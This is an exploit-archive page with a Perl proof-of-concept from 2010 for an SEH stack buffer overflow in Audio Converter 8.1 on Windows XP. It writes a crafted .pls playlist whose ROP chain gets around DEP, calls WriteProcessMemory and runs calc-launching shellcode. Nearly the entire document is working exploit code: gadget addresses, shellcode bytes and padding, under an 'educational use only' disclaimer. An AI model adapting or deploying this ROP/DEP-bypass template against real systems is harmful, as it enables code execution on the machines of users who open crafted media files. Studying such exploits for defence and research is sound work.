[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM
# Published : 2010-06-07
# Author : Sud0
# Previous Title : Easy CD-DA Recorder 2007 SEH Buffer Overflow
# Next Title : Mediacoder v0.7.3.4672 SEH Exploit
#***********************************************************************************
# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM
# Date : 07/06/2010
# Author : Sud0
# Bug found by : chap0
# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
# Version : 8.1
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Thanks to my wife for her support
# Thanks for chap0 for bringing us the game
# Greetz to: Corelan Security Team
# mr_me you'r killing the ROP bro :)
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Using ROP to bypass DEP protection and call WPM
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :
print "|------------------------------------------------------------------|n";
print "| __ __ |n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |n";
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |n";
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |n";
print "| |n";
print "| http://www.corelan.be:8800 |n";
print "| |n";
print "|-------------------------------------------------[ EIP Hunters ]--|nn";
print "[+] Exploit for .... n";
my $filename="newaudio.pls";
# Small Shellcode to run calc
my $shellcode = "x8BxECx55x8BxECx68x20x20x20x2Fx68x63x61x6Cx63x8Dx45xF8x50xB8xC7x93xC2x77xFFxD0";
my $buffer = "A" x 280; # some junk
$buffer .= "x31x2Ax00x10"; # mov eax,ebp / pop ebp / retn4
$buffer .= "B" x 12; # some junk
$buffer .= "x1DxA4x07x10"; # add eax,100 / pop ebp / retn
$buffer .= "B" x 8; # some junk
$buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn
$buffer .= "B" x 4 ; # some junk
$buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn
$buffer .= "B" x 4 ; # some junk
$buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn
$buffer .= "B" x 4 ; # some junk
$buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn
$buffer .= "B" x 4 ; # some junk
$buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn
$buffer .= "B" x 4 ; # some junk
$buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn
$buffer .= "B" x 4 ; # some junk
$buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn
$buffer .= "B" x 4 ; # some junk
$buffer .= "x1DxA4x07x10"; # NEXT : add eax,100 / pop ebp / retn
$buffer .= "B" x 4 ; # some junk
$buffer .= "x00x8Dx00x10"; # POP EDI / RETN
$buffer .= "xB6x12x00x10"; # ADD ESP,4 / RETN
$buffer .= "x05x21x00x10"; # ADD ESP,14 / RETN
$buffer .= "B" x 20 ; # some junk
$buffer .= "x79x84x02x10"; # mov dword ptr ss:[esp + 10], eax / call EDI
$buffer .= "x13x22x80x7C"; # @ of WPM
$buffer .= "xFFxFFxFFxFF"; # RET after WPM choose one and use it
$buffer .= "xFFxFFxFFxFF"; # -1 : means process itself
$buffer .= "xCFx22x80x7C"; # Destination address
$buffer .= "B" x 4 ; # some junk, @ of shellcode will land here
$buffer .= "x1Ax00x00x00"; # size of shellcode
$buffer .= "x00xA0x45x00"; # Writeable memory
$buffer .= "B" x 12; # some junk
$buffer .= $shellcode;
$buffer .= "B" x (4436 -length($buffer)); # some junk
$buffer .= "x2Fx37x01x10"; # SEH : add esp, 878 / retn 8
$buffer .= "A" x 10000; # some junk
print "Removing old $filename filen";
system("del $filename");
print "Creating new $filename filen";
open(FILE, ">$filename");
print FILE $buffer;
close(FILE);